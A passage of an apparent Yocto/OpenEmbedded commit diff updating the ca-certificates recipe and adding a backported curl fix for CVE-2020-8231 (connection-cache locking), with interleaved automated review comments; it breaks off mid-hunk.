+ -- Julien Cristau <jcristau@debian.org> Thu, 07 Oct 2021 17:12:47 +0200
+
+diff --git a/debian/control b/debian/control
+index 4434b7a..5c6ba24 100644
+--- a/debian/control
++++ b/debian/control
+@@ -3,7 +3,7 @@ Section: misc
+ Priority: optional
+ Maintainer: Julien Cristau <jcristau@debian.org>
+ Build-Depends: debhelper-compat (= 13), po-debconf
+-Build-Depends-Indep: python3, openssl, python3-cryptography
++Build-Depends-Indep: python3, openssl
+ Standards-Version: 4.5.0.2
+ Vcs-Git: https://salsa.debian.org/debian/ca-certificates.git
+ Vcs-Browser: https://salsa.debian.org/debian/ca-certificates
+diff --git a/mozilla/certdata2pem.py b/mozilla/certdata2pem.py
+index ede23d4..7d796f1 100644
+--- a/mozilla/certdata2pem.py
++++ b/mozilla/certdata2pem.py
+@@ -21,16 +21,12 @@
+ # USA.
+
+ import base64
+-import datetime
+ import os.path
+ import re
+ import sys
+ import textwrap
+ import io
+
+-from cryptography import x509
+-
+-
+ objects = []
+
+ # Dirty file parser.
+@@ -121,13 +117,6 @@ for obj in objects:
+ if obj['CKA_CLASS'] == 'CKO_CERTIFICATE':
+ if not obj['CKA_LABEL'] in trust or not trust[obj['CKA_LABEL']]:
+ continue
+-
+- cert = x509.load_der_x509_certificate(obj['CKA_VALUE'])
+- if cert.not_valid_after < datetime.datetime.now():
+- print('!'*74)
+- print('Trusted but expired certificate found: %s' % obj['CKA_LABEL'])
+- print('!'*74)
+-
+ bname = obj['CKA_LABEL'][1:-1].replace('/', '_')\
+ .replace(' ', '_')\
+ .replace('(', '=')\
+--
+2.20.1
+
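Review bot: The patch header at the top of this new file says the reverted code "only checks for expired certs", but it does not say what the revert means for the generated trust store, which is the first thing a security reviewer will ask. From the removed lines in the `mozilla/certdata2pem.py` hunk, the block only printed `Trusted but expired certificate found` and then fell through to the file-naming code. The certificates written out therefore appear unchanged, and only the build-time diagnostic is lost. I would state that in the header, for example `The reverted check only printed a warning; expired certificates were never excluded, so the generated bundle is unchanged.` The loop body continues outside the embedded hunk, so confirm this against the full script before recording it.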
diff --git a/meta/recipes-support/ca-certificates/ca-certificates/0001-certdata2pem.py-use-python3.patch b/meta/recipes-support/ca-certificates/ca-certificates/0001-certdata2pem.py-use-python3.patch
deleted file mode 100644
index aa2c85ff43..0000000000
--- a/meta/recipes-support/ca-certificates/ca-certificates/0001-certdata2pem.py-use-python3.patch
+++ /dev/null
@@ -1,37 +0,0 @@
-From b6d18ca77f131cdcaa10d0eaa9d303399767edf6 Mon Sep 17 00:00:00 2001
-From: Alexander Kanavin <alex.kanavin@gmail.com>
-Date: Wed, 28 Aug 2019 19:18:14 +0200
-Subject: [PATCH] certdata2pem.py: use python3
-
-Comments in that file imply it is already py3 compatible.
-
-Upstream-Status: Pending
-Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
----
- mozilla/Makefile | 2 +-
- mozilla/certdata2pem.py | 2 +-
- 2 files changed, 2 insertions(+), 2 deletions(-)
-
-diff --git a/mozilla/Makefile b/mozilla/Makefile
-index 6f46118..f98877c 100644
---- a/mozilla/Makefile
-+++ b/mozilla/Makefile
-@@ -3,7 +3,7 @@
- #
-
- all:
-- python certdata2pem.py
-+ python3 certdata2pem.py
-
- clean:
- -rm -f *.crt
-diff --git a/mozilla/certdata2pem.py b/mozilla/certdata2pem.py
-index 0b02b2a..7d796f1 100644
---- a/mozilla/certdata2pem.py
-+++ b/mozilla/certdata2pem.py
-@@ -1,4 +1,4 @@
--#!/usr/bin/python
-+#!/usr/bin/python3
- # vim:set et sw=4:
- #
- # certdata2pem.py - splits certdata.txt into multiple files
diff --git a/meta/recipes-support/ca-certificates/ca-certificates/sbindir.patch b/meta/recipes-support/ca-certificates/ca-certificates/sbindir.patch
deleted file mode 100644
index a113fa8b15..0000000000
--- a/meta/recipes-support/ca-certificates/ca-certificates/sbindir.patch
+++ /dev/null
@@ -1,20 +0,0 @@
-Upstream-Status: Pending
-
-Let us alter the install destination of the script via SBINDIR
-
---- ca-certificates-20130119.orig/sbin/Makefile
-+++ ca-certificates-20130119/sbin/Makefile
-@@ -3,9 +3,12 @@
- #
- #
-
-+SBINDIR = /usr/sbin
-+
- all:
-
- clean:
-
- install:
-- install -m755 update-ca-certificates $(DESTDIR)/usr/sbin/
-+ install -d $(DESTDIR)$(SBINDIR)
-+ install -m755 update-ca-certificates $(DESTDIR)$(SBINDIR)/
diff --git a/meta/recipes-support/ca-certificates/ca-certificates/update-ca-certificates-support-Toybox.patch b/meta/recipes-support/ca-certificates/ca-certificates/update-ca-certificates-support-Toybox.patch
deleted file mode 100644
index 6e2171f758..0000000000
--- a/meta/recipes-support/ca-certificates/ca-certificates/update-ca-certificates-support-Toybox.patch
+++ /dev/null
@@ -1,34 +0,0 @@
-From 30378026d136efa779732e3f6664e2ecf461e458 Mon Sep 17 00:00:00 2001
-From: Patrick Ohly <patrick.ohly@intel.com>
-Date: Thu, 17 Mar 2016 12:38:09 +0100
-Subject: [PATCH] update-ca-certificates: support Toybox
-
-"mktemp -t" is deprecated and does not work when using Toybox. Replace
-with something that works also with Toybox.
-
-Upstream-Status: Pending
-
-Signed-off-by: Patrick Ohly <patrick.ohly@intel.com>
----
- sbin/update-ca-certificates | 6 +++---
- 1 file changed, 3 insertions(+), 3 deletions(-)
-
-diff --git a/sbin/update-ca-certificates b/sbin/update-ca-certificates
-index 79c41bb..ae9e3f1 100755
---- a/sbin/update-ca-certificates
-+++ b/sbin/update-ca-certificates
-@@ -113,9 +113,9 @@ trap cleanup 0
-
- # Helper files. (Some of them are not simple arrays because we spawn
- # subshells later on.)
--TEMPBUNDLE="$(mktemp -t "${CERTBUNDLE}.tmp.XXXXXX")"
--ADDED="$(mktemp -t "ca-certificates.tmp.XXXXXX")"
--REMOVED="$(mktemp -t "ca-certificates.tmp.XXXXXX")"
-+TEMPBUNDLE="$(mktemp -p${TMPDIR:-/tmp} "${CERTBUNDLE}.tmp.XXXXXX")"
-+ADDED="$(mktemp -p${TMPDIR:-/tmp} "ca-certificates.tmp.XXXXXX")"
-+REMOVED="$(mktemp -p${TMPDIR:-/tmp} "ca-certificates.tmp.XXXXXX")"
-
- # Adds a certificate to the list of trusted ones. This includes a symlink
- # in /etc/ssl/certs to the certificate file and its inclusion into the
---
-2.1.4
diff --git a/meta/recipes-support/ca-certificates/ca-certificates_20190110.bb b/meta/recipes-support/ca-certificates/ca-certificates_20211016.bb
index ce3cb217a1..a54d6b458a 100644
--- a/meta/recipes-support/ca-certificates/ca-certificates_20190110.bb
+++ b/meta/recipes-support/ca-certificates/ca-certificates_20211016.bb
@@ -5,7 +5,7 @@ This derived from Debian's CA Certificates."
HOMEPAGE = "http://packages.debian.org/sid/ca-certificates"
SECTION = "misc"
LICENSE = "GPL-2.0+ & MPL-2.0"
-LIC_FILES_CHKSUM = "file://debian/copyright;md5=aeb420429b1659507e0a5a1b123e8308"
+LIC_FILES_CHKSUM = "file://debian/copyright;md5=ae5b36b514e3f12ce1aa8e2ee67f3d7e"
# This is needed to ensure we can run the postinst at image creation time
DEPENDS = ""
@@ -14,17 +14,16 @@ DEPENDS_class-nativesdk = "openssl-native"
# Need rehash from openssl and run-parts from debianutils
PACKAGE_WRITE_DEPS += "openssl-native debianutils-native"
-SRCREV = "c28799b138b044c963d24c4a69659b6e5486e3be"
+SRCREV = "07de54fdcc5806bde549e1edf60738c6bccf50e8"
-SRC_URI = "git://salsa.debian.org/debian/ca-certificates.git;protocol=https \
+SRC_URI = "git://salsa.debian.org/debian/ca-certificates.git;protocol=https;branch=master \
file://0002-update-ca-certificates-use-SYSROOT.patch \
file://0001-update-ca-certificates-don-t-use-Debianisms-in-run-p.patch \
- file://update-ca-certificates-support-Toybox.patch \
file://default-sysroot.patch \
- file://sbindir.patch \
file://0003-update-ca-certificates-use-relative-symlinks-from-ET.patch \
- file://0001-certdata2pem.py-use-python3.patch \
+ file://0001-Revert-mozilla-certdata2pem.py-print-a-warning-for-e.patch \
"
+UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>\d+)"
S = "${WORKDIR}/git"
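Review bot: This hunk drops `file://update-ca-certificates-support-Toybox.patch` and `file://sbindir.patch` from `SRC_URI`, yet both deleted patch files carried `Upstream-Status: Pending`, and nothing visible here shows that upstream took equivalent changes. If the new `SRCREV` still uses `mktemp -t` in `sbin/update-ca-certificates` or a hard-coded `$(DESTDIR)/usr/sbin/` in `sbin/Makefile`, the Toybox and install-path fixes are silently lost. I would check both files at the pinned revision. If either change is missing, keep the corresponding line, e.g. `file://sbindir.patch \`; otherwise record in the commit message that they were merged upstream.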
@@ -83,8 +82,8 @@ do_install_append_class-native () {
SYSROOT="${D}${base_prefix}" ${D}${sbindir}/update-ca-certificates
}
-RDEPENDS_${PN}_class-target = "openssl-bin"
-RDEPENDS_${PN}_class-native = "openssl-native"
-RDEPENDS_${PN}_class-nativesdk = "nativesdk-openssl-bin"
+RDEPENDS_${PN}_append_class-target = " openssl-bin openssl"
+RDEPENDS_${PN}_append_class-native = " openssl-native"
+RDEPENDS_${PN}_append_class-nativesdk = " nativesdk-openssl-bin nativesdk-openssl"
BBCLASSEXTEND = "native nativesdk"
diff --git a/meta/recipes-support/consolekit/consolekit_0.4.6.bb b/meta/recipes-support/consolekit/consolekit_0.4.6.bb
index 89f2d77b66..22e755747b 100644
--- a/meta/recipes-support/consolekit/consolekit_0.4.6.bb
+++ b/meta/recipes-support/consolekit/consolekit_0.4.6.bb
@@ -1,4 +1,6 @@
SUMMARY = "Framework for defining and tracking users, login sessions, and seats"
+DESCRIPTION = "It provides a mechanism for software to react to changes \
+of any of these items or of any of the metadata associated with them."
HOMEPAGE = "http://www.freedesktop.org/wiki/Software/ConsoleKit"
BUGTRACKER = "https://bugs.freedesktop.org/buglist.cgi?query_format=specific&product=ConsoleKit"
diff --git a/meta/recipes-support/curl/curl/CVE-2020-8231.patch b/meta/recipes-support/curl/curl/CVE-2020-8231.patch
new file mode 100644
index 0000000000..51f40047f1
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2020-8231.patch
@@ -0,0 +1,1092 @@
+From c3359693e17fccdf2a04f0b908bc8f51cdc38133 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 27 Apr 2020 00:33:21 +0200
+Subject: [PATCH 1/3] conncache: various concept cleanups
+
+More connection cache accesses are protected by locks.
+
+CONNCACHE_* is a beter prefix for the connection cache lock macros.
+
+Curl_attach_connnection: now called as soon as there's a connection
+struct available and before the connection is added to the connection
+cache.
+
+Curl_disconnect: now assumes that the connection is already removed from
+the connection cache.
+
+Ref: #4915
+Closes #5009
+
+Upstream-commit: c06902713998d68202c5a764de910ba8d0e8f54d
+Signed-off-by: Kamil Dudka <kdudka@redhat.com>
+
+Upstream-Status: Backport [import from fedora https://koji.fedoraproject.org/koji/fileinfo?rpmID=24270817&filename=0004-curl-7.69.1-CVE-2020-8231.patch ]
+CVE: CVE-2020-8286
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ lib/conncache.c | 87 ++++++++++++++++++++-----------------------
+ lib/conncache.h | 9 ++---
+ lib/hostip.c | 12 +++---
+ lib/http_negotiate.h | 6 ++-
+ lib/http_ntlm.h | 6 ++-
+ lib/multi.c | 56 ++++++++++++++--------------
+ lib/multiif.h | 1 +
+ lib/url.c | 69 ++++++++++++++++++----------------
+ tests/data/test1554 | 14 +++++++
+ tests/unit/unit1620.c | 6 +--
+ 10 files changed, 139 insertions(+), 127 deletions(-)
+
+diff --git a/lib/conncache.c b/lib/conncache.c
+index cbd3bb1..95fcea6 100644
+--- a/lib/conncache.c
++++ b/lib/conncache.c
+@@ -49,53 +49,51 @@ static void conn_llist_dtor(void *user, void *element)
+ conn->bundle = NULL;
+ }
+
+-static CURLcode bundle_create(struct Curl_easy *data,
+- struct connectbundle **cb_ptr)
++static CURLcode bundle_create(struct connectbundle **bundlep)
+ {
+- (void)data;
+- DEBUGASSERT(*cb_ptr == NULL);
+- *cb_ptr = malloc(sizeof(struct connectbundle));
+- if(!*cb_ptr)
++ DEBUGASSERT(*bundlep == NULL);
++ *bundlep = malloc(sizeof(struct connectbundle));
++ if(!*bundlep)
+ return CURLE_OUT_OF_MEMORY;
+
+- (*cb_ptr)->num_connections = 0;
+- (*cb_ptr)->multiuse = BUNDLE_UNKNOWN;
++ (*bundlep)->num_connections = 0;
++ (*bundlep)->multiuse = BUNDLE_UNKNOWN;
+
+- Curl_llist_init(&(*cb_ptr)->conn_list, (curl_llist_dtor) conn_llist_dtor);
++ Curl_llist_init(&(*bundlep)->conn_list, (curl_llist_dtor) conn_llist_dtor);
+ return CURLE_OK;
+ }
+
+-static void bundle_destroy(struct connectbundle *cb_ptr)
++static void bundle_destroy(struct connectbundle *bundle)
+ {
+- if(!cb_ptr)
++ if(!bundle)
+ return;
+
+- Curl_llist_destroy(&cb_ptr->conn_list, NULL);
++ Curl_llist_destroy(&bundle->conn_list, NULL);
+
+- free(cb_ptr);
++ free(bundle);
+ }
+
+ /* Add a connection to a bundle */
+-static void bundle_add_conn(struct connectbundle *cb_ptr,
++static void bundle_add_conn(struct connectbundle *bundle,
+ struct connectdata *conn)
+ {
+- Curl_llist_insert_next(&cb_ptr->conn_list, cb_ptr->conn_list.tail, conn,
++ Curl_llist_insert_next(&bundle->conn_list, bundle->conn_list.tail, conn,
+ &conn->bundle_node);
+- conn->bundle = cb_ptr;
+- cb_ptr->num_connections++;
++ conn->bundle = bundle;
++ bundle->num_connections++;
+ }
+
+ /* Remove a connection from a bundle */
+-static int bundle_remove_conn(struct connectbundle *cb_ptr,
++static int bundle_remove_conn(struct connectbundle *bundle,
+ struct connectdata *conn)
+ {
+ struct curl_llist_element *curr;
+
+- curr = cb_ptr->conn_list.head;
++ curr = bundle->conn_list.head;
+ while(curr) {
+ if(curr->ptr == conn) {
+- Curl_llist_remove(&cb_ptr->conn_list, curr, NULL);
+- cb_ptr->num_connections--;
++ Curl_llist_remove(&bundle->conn_list, curr, NULL);
++ bundle->num_connections--;
+ conn->bundle = NULL;
+ return 1; /* we removed a handle */
+ }
+@@ -162,20 +160,15 @@ static void hashkey(struct connectdata *conn, char *buf,
+ msnprintf(buf, len, "%ld%s", port, hostname);
+ }
+
+-void Curl_conncache_unlock(struct Curl_easy *data)
+-{
+- CONN_UNLOCK(data);
+-}
+-
+ /* Returns number of connections currently held in the connection cache.
+ Locks/unlocks the cache itself!
+ */
+ size_t Curl_conncache_size(struct Curl_easy *data)
+ {
+ size_t num;
+- CONN_LOCK(data);
++ CONNCACHE_LOCK(data);
+ num = data->state.conn_cache->num_conn;
+- CONN_UNLOCK(data);
++ CONNCACHE_UNLOCK(data);
+ return num;
+ }
+
+@@ -188,7 +181,7 @@ struct connectbundle *Curl_conncache_find_bundle(struct connectdata *conn,
+ const char **hostp)
+ {
+ struct connectbundle *bundle = NULL;
+- CONN_LOCK(conn->data);
++ CONNCACHE_LOCK(conn->data);
+ if(connc) {
+ char key[HASHKEY_SIZE];
+ hashkey(conn, key, sizeof(key), hostp);
+@@ -235,8 +228,7 @@ CURLcode Curl_conncache_add_conn(struct conncache *connc,
+ struct connectdata *conn)
+ {
+ CURLcode result = CURLE_OK;
+- struct connectbundle *bundle;
+- struct connectbundle *new_bundle = NULL;
++ struct connectbundle *bundle = NULL;
+ struct Curl_easy *data = conn->data;
+
+ /* *find_bundle() locks the connection cache */
+@@ -245,20 +237,19 @@ CURLcode Curl_conncache_add_conn(struct conncache *connc,
+ int rc;
+ char key[HASHKEY_SIZE];
+
+- result = bundle_create(data, &new_bundle);
++ result = bundle_create(&bundle);
+ if(result) {
+ goto unlock;
+ }
+
+ hashkey(conn, key, sizeof(key), NULL);
+- rc = conncache_add_bundle(data->state.conn_cache, key, new_bundle);
++ rc = conncache_add_bundle(data->state.conn_cache, key, bundle);
+
+ if(!rc) {
+- bundle_destroy(new_bundle);
++ bundle_destroy(bundle);
+ result = CURLE_OUT_OF_MEMORY;
+ goto unlock;
+ }
+- bundle = new_bundle;
+ }
+
+ bundle_add_conn(bundle, conn);
+@@ -270,15 +261,17 @@ CURLcode Curl_conncache_add_conn(struct conncache *connc,
+ conn->connection_id, connc->num_conn));
+
+ unlock:
+- CONN_UNLOCK(data);
++ CONNCACHE_UNLOCK(data);
+
+ return result;
+ }
+
+ /*
+- * Removes the connectdata object from the connection cache *and* clears the
+- * ->data pointer association. Pass TRUE/FALSE in the 'lock' argument
+- * depending on if the parent function already holds the lock or not.
++ * Removes the connectdata object from the connection cache, but does *not*
++ * clear the conn->data association. The transfer still owns this connection.
++ *
++ * Pass TRUE/FALSE in the 'lock' argument depending on if the parent function
++ * already holds the lock or not.
+ */
+ void Curl_conncache_remove_conn(struct Curl_easy *data,
+ struct connectdata *conn, bool lock)
+@@ -290,7 +283,7 @@ void Curl_conncache_remove_conn(struct Curl_easy *data,
+ due to a failed connection attempt, before being added to a bundle */
+ if(bundle) {
+ if(lock) {
+- CONN_LOCK(data);
++ CONNCACHE_LOCK(data);
+ }
+ bundle_remove_conn(bundle, conn);
+ if(bundle->num_connections == 0)
+@@ -301,9 +294,8 @@ void Curl_conncache_remove_conn(struct Curl_easy *data,
+ DEBUGF(infof(data, "The cache now contains %zu members\n",
+ connc->num_conn));
+ }
+- conn->data = NULL; /* clear the association */
+ if(lock) {
+- CONN_UNLOCK(data);
++ CONNCACHE_UNLOCK(data);
+ }
+ }
+ }
+@@ -332,7 +324,7 @@ bool Curl_conncache_foreach(struct Curl_easy *data,
+ if(!connc)
+ return FALSE;
+
+- CONN_LOCK(data);
++ CONNCACHE_LOCK(data);
+ Curl_hash_start_iterate(&connc->hash, &iter);
+
+ he = Curl_hash_next_element(&iter);
+@@ -350,12 +342,12 @@ bool Curl_conncache_foreach(struct Curl_easy *data,
+ curr = curr->next;
+
+ if(1 == func(conn, param)) {
+- CONN_UNLOCK(data);
++ CONNCACHE_UNLOCK(data);
+ return TRUE;
+ }
+ }
+ }
+- CONN_UNLOCK(data);
++ CONNCACHE_UNLOCK(data);
+ return FALSE;
+ }
+
+@@ -494,7 +486,7 @@ Curl_conncache_extract_oldest(struct Curl_easy *data)
+
+ now = Curl_now();
+
+- CONN_LOCK(data);
++ CONNCACHE_LOCK(data);
+ Curl_hash_start_iterate(&connc->hash, &iter);
+
+ he = Curl_hash_next_element(&iter);
+@@ -531,7 +523,7 @@ Curl_conncache_extract_oldest(struct Curl_easy *data)
+ connc->num_conn));
+ conn_candidate->data = data; /* associate! */
+ }
+- CONN_UNLOCK(data);
++ CONNCACHE_UNLOCK(data);
+
+ return conn_candidate;
+ }
+@@ -548,6 +540,7 @@ void Curl_conncache_close_all_connections(struct conncache *connc)
+ sigpipe_ignore(conn->data, &pipe_st);
+ /* This will remove the connection from the cache */
+ connclose(conn, "kill all");
++ Curl_conncache_remove_conn(conn->data, conn, TRUE);
+ (void)Curl_disconnect(connc->closure_handle, conn, FALSE);
+ sigpipe_restore(&pipe_st);
+
+diff --git a/lib/conncache.h b/lib/conncache.h
+index e3e4c9c..3dda21c 100644
+--- a/lib/conncache.h
++++ b/lib/conncache.h
+@@ -45,21 +45,21 @@ struct conncache {
+ #ifdef CURLDEBUG
+ /* the debug versions of these macros make extra certain that the lock is
+ never doubly locked or unlocked */
+-#define CONN_LOCK(x) if((x)->share) { \
++#define CONNCACHE_LOCK(x) if((x)->share) { \
+ Curl_share_lock((x), CURL_LOCK_DATA_CONNECT, CURL_LOCK_ACCESS_SINGLE); \
+ DEBUGASSERT(!(x)->state.conncache_lock); \
+ (x)->state.conncache_lock = TRUE; \
+ }
+
+-#define CONN_UNLOCK(x) if((x)->share) { \
++#define CONNCACHE_UNLOCK(x) if((x)->share) { \
+ DEBUGASSERT((x)->state.conncache_lock); \
+ (x)->state.conncache_lock = FALSE; \
+ Curl_share_unlock((x), CURL_LOCK_DATA_CONNECT); \
+ }
+ #else
+-#define CONN_LOCK(x) if((x)->share) \
++#define CONNCACHE_LOCK(x) if((x)->share) \
+ Curl_share_lock((x), CURL_LOCK_DATA_CONNECT, CURL_LOCK_ACCESS_SINGLE)
+-#define CONN_UNLOCK(x) if((x)->share) \
++#define CONNCACHE_UNLOCK(x) if((x)->share) \
+ Curl_share_unlock((x), CURL_LOCK_DATA_CONNECT)
+ #endif
+
+@@ -77,7 +77,6 @@ void Curl_conncache_destroy(struct conncache *connc);
+ struct connectbundle *Curl_conncache_find_bundle(struct connectdata *conn,
+ struct conncache *connc,
+ const char **hostp);
+-void Curl_conncache_unlock(struct Curl_easy *data);
+ /* returns number of connections currently held in the connection cache */
+ size_t Curl_conncache_size(struct Curl_easy *data);
+
+diff --git a/lib/hostip.c b/lib/hostip.c
+index c0feb79..f5bb634 100644
+--- a/lib/hostip.c
++++ b/lib/hostip.c
+@@ -1085,10 +1085,12 @@ CURLcode Curl_once_resolved(struct connectdata *conn,
+
+ result = Curl_setup_conn(conn, protocol_done);
+
+- if(result)
+- /* We're not allowed to return failure with memory left allocated
+- in the connectdata struct, free those here */
+- Curl_disconnect(conn->data, conn, TRUE); /* close the connection */
+-
++ if(result) {
++ struct Curl_easy *data = conn->data;
++ DEBUGASSERT(data);
++ Curl_detach_connnection(data);
++ Curl_conncache_remove_conn(data, conn, TRUE);
++ Curl_disconnect(data, conn, TRUE);
++ }
+ return result;
+ }
+diff --git a/lib/http_negotiate.h b/lib/http_negotiate.h
+index 4f0ac16..a737f6f 100644
+--- a/lib/http_negotiate.h
++++ b/lib/http_negotiate.h
+@@ -7,7 +7,7 @@
+ * | (__| |_| | _ <| |___
+ * \___|\___/|_| \_\_____|
+ *
+- * Copyright (C) 1998 - 2019, Daniel Stenberg, <daniel@haxx.se>, et al.
++ * Copyright (C) 1998 - 2020, Daniel Stenberg, <daniel@haxx.se>, et al.
+ *
+ * This software is licensed as described in the file COPYING, which
+ * you should have received as part of this distribution. The terms
+@@ -33,6 +33,8 @@ CURLcode Curl_output_negotiate(struct connectdata *conn, bool proxy);
+
+ void Curl_http_auth_cleanup_negotiate(struct connectdata *conn);
+
+-#endif /* !CURL_DISABLE_HTTP && USE_SPNEGO */
++#else /* !CURL_DISABLE_HTTP && USE_SPNEGO */
++#define Curl_http_auth_cleanup_negotiate(x)
++#endif
+
+ #endif /* HEADER_CURL_HTTP_NEGOTIATE_H */
+diff --git a/lib/http_ntlm.h b/lib/http_ntlm.h
+index 003714d..3ebdf97 100644
+--- a/lib/http_ntlm.h
++++ b/lib/http_ntlm.h
+@@ -7,7 +7,7 @@
+ * | (__| |_| | _ <| |___
+ * \___|\___/|_| \_\_____|
+ *
+- * Copyright (C) 1998 - 2019, Daniel Stenberg, <daniel@haxx.se>, et al.
++ * Copyright (C) 1998 - 2020, Daniel Stenberg, <daniel@haxx.se>, et al.
+ *
+ * This software is licensed as described in the file COPYING, which
+ * you should have received as part of this distribution. The terms
+@@ -35,6 +35,8 @@ CURLcode Curl_output_ntlm(struct connectdata *conn, bool proxy);
+
+ void Curl_http_auth_cleanup_ntlm(struct connectdata *conn);
+
+-#endif /* !CURL_DISABLE_HTTP && USE_NTLM */
++#else /* !CURL_DISABLE_HTTP && USE_NTLM */
++#define Curl_http_auth_cleanup_ntlm(x)
++#endif
+
+ #endif /* HEADER_CURL_HTTP_NTLM_H */
+diff --git a/lib/multi.c b/lib/multi.c
+index e10e752..273653d 100644
+--- a/lib/multi.c
++++ b/lib/multi.c
+@@ -79,7 +79,6 @@ static CURLMcode add_next_timeout(struct curltime now,
+ static CURLMcode multi_timeout(struct Curl_multi *multi,
+ long *timeout_ms);
+ static void process_pending_handles(struct Curl_multi *multi);
+-static void detach_connnection(struct Curl_easy *data);
+
+ #ifdef DEBUGBUILD
+ static const char * const statename[]={
+@@ -112,7 +111,7 @@ static void Curl_init_completed(struct Curl_easy *data)
+
+ /* Important: reset the conn pointer so that we don't point to memory
+ that could be freed anytime */
+- detach_connnection(data);
++ Curl_detach_connnection(data);
+ Curl_expire_clear(data); /* stop all timers */
+ }
+
+@@ -506,6 +505,7 @@ CURLMcode curl_multi_add_handle(struct Curl_multi *multi,
+ easy handle is added */
+ memset(&multi->timer_lastcall, 0, sizeof(multi->timer_lastcall));
+
++ CONNCACHE_LOCK(data);
+ /* The closure handle only ever has default timeouts set. To improve the
+ state somewhat we clone the timeouts from each added handle so that the
+ closure handle always has the same timeouts as the most recently added
+@@ -515,6 +515,7 @@ CURLMcode curl_multi_add_handle(struct Curl_multi *multi,
+ data->set.server_response_timeout;
+ data->state.conn_cache->closure_handle->set.no_signal =
+ data->set.no_signal;
++ CONNCACHE_UNLOCK(data);
+
+ Curl_update_timer(multi);
+ return CURLM_OK;
+@@ -589,14 +590,14 @@ static CURLcode multi_done(struct Curl_easy *data,
+
+ process_pending_handles(data->multi); /* connection / multiplex */
+
+- CONN_LOCK(data);
+- detach_connnection(data);
++ CONNCACHE_LOCK(data);
++ Curl_detach_connnection(data);
+ if(CONN_INUSE(conn)) {
+ /* Stop if still used. */
+ /* conn->data must not remain pointing to this transfer since it is going
+ away! Find another to own it! */
+ conn->data = conn->easyq.head->ptr;
+- CONN_UNLOCK(data);
++ CONNCACHE_UNLOCK(data);
+ DEBUGF(infof(data, "Connection still in use %zu, "
+ "no more multi_done now!\n",
+ conn->easyq.size));
+@@ -647,7 +648,8 @@ static CURLcode multi_done(struct Curl_easy *data,
+ || (premature && !(conn->handler->flags & PROTOPT_STREAM))) {
+ CURLcode res2;
+ connclose(conn, "disconnecting");
+- CONN_UNLOCK(data);
++ Curl_conncache_remove_conn(data, conn, FALSE);
++ CONNCACHE_UNLOCK(data);
+ res2 = Curl_disconnect(data, conn, premature);
+
+ /* If we had an error already, make sure we return that one. But
+@@ -666,7 +668,7 @@ static CURLcode multi_done(struct Curl_easy *data,
+ conn->bits.conn_to_host ? conn->conn_to_host.dispname :
+ conn->host.dispname);
+ /* the connection is no longer in use by this transfer */
+- CONN_UNLOCK(data);
++ CONNCACHE_UNLOCK(data);
+ if(Curl_conncache_return_conn(data, conn)) {
+ /* remember the most recently used connection */
+ data->state.lastconnect = conn;
+@@ -774,8 +776,7 @@ CURLMcode curl_multi_remove_handle(struct Curl_multi *multi,
+ vanish with this handle */
+
+ /* Remove the association between the connection and the handle */
+- if(data->conn)
+- detach_connnection(data);
++ Curl_detach_connnection(data);
+
+ #ifdef USE_LIBPSL
+ /* Remove the PSL association. */
+@@ -824,9 +825,13 @@ bool Curl_multiplex_wanted(const struct Curl_multi *multi)
+ return (multi && (multi->multiplexing));
+ }
+
+-/* This is the only function that should clear data->conn. This will
+- occasionally be called with the pointer already cleared. */
+-static void detach_connnection(struct Curl_easy *data)
++/*
++ * Curl_detach_connnection() removes the given transfer from the connection.
++ *
++ * This is the only function that should clear data->conn. This will
++ * occasionally be called with the data->conn pointer already cleared.
++ */
++void Curl_detach_connnection(struct Curl_easy *data)
+ {
+ struct connectdata *conn = data->conn;
+ if(conn)
+@@ -834,7 +839,11 @@ static void detach_connnection(struct Curl_easy *data)
+ data->conn = NULL;
+ }
+
+-/* This is the only function that should assign data->conn */
++/*
++ * Curl_attach_connnection() attaches this transfer to this connection.
++ *
++ * This is the only function that should assign data->conn
++ */
+ void Curl_attach_connnection(struct Curl_easy *data,
+ struct connectdata *conn)
+ {
+@@ -1536,19 +1545,6 @@ static CURLMcode multi_runsingle(struct Curl_multi *multi,
+ bool stream_error = FALSE;
+ rc = CURLM_OK;
+
+- DEBUGASSERT((data->mstate <= CURLM_STATE_CONNECT) ||
+- (data->mstate >= CURLM_STATE_DONE) ||
+- data->conn);
+- if(!data->conn &&
+- data->mstate > CURLM_STATE_CONNECT &&
+- data->mstate < CURLM_STATE_DONE) {
+- /* In all these states, the code will blindly access 'data->conn'
+- so this is precaution that it isn't NULL. And it silences static
+- analyzers. */
+- failf(data, "In state %d with no conn, bail out!\n", data->mstate);
+- return CURLM_INTERNAL_ERROR;
+- }
+-
+ if(multi_ischanged(multi, TRUE)) {
+ DEBUGF(infof(data, "multi changed, check CONNECT_PEND queue!\n"));
+ process_pending_handles(multi); /* multiplexed */
+@@ -2231,8 +2227,7 @@ static CURLMcode multi_runsingle(struct Curl_multi *multi,
+ * access free'd data, if the connection is free'd and the handle
+ * removed before we perform the processing in CURLM_STATE_COMPLETED
+ */
+- if(data->conn)
+- detach_connnection(data);
++ Curl_detach_connnection(data);
+ }
+
+ #ifndef CURL_DISABLE_FTP
+@@ -2284,7 +2279,10 @@ static CURLMcode multi_runsingle(struct Curl_multi *multi,
+ /* This is where we make sure that the conn pointer is reset.
+ We don't have to do this in every case block above where a
+ failure is detected */
+- detach_connnection(data);
++ Curl_detach_connnection(data);
++
++ /* remove connection from cache */
++ Curl_conncache_remove_conn(data, conn, TRUE);
+
+ /* disconnect properly */
+ Curl_disconnect(data, conn, dead_connection);
+diff --git a/lib/multiif.h b/lib/multiif.h
+index bde755e..c07587b 100644
+--- a/lib/multiif.h
++++ b/lib/multiif.h
+@@ -33,6 +33,7 @@ void Curl_expire_done(struct Curl_easy *data, expire_id id);
+ void Curl_update_timer(struct Curl_multi *multi);
+ void Curl_attach_connnection(struct Curl_easy *data,
+ struct connectdata *conn);
++void Curl_detach_connnection(struct Curl_easy *data);
+ bool Curl_multiplex_wanted(const struct Curl_multi *multi);
+ void Curl_set_in_callback(struct Curl_easy *data, bool value);
+ bool Curl_is_in_callback(struct Curl_easy *easy);
+diff --git a/lib/url.c b/lib/url.c
+index a826f8a..4ed0623 100644
+--- a/lib/url.c
++++ b/lib/url.c
+@@ -679,9 +679,7 @@ static void conn_reset_all_postponed_data(struct connectdata *conn)
+
+ static void conn_shutdown(struct connectdata *conn)
+ {
+- if(!conn)
+- return;
+-
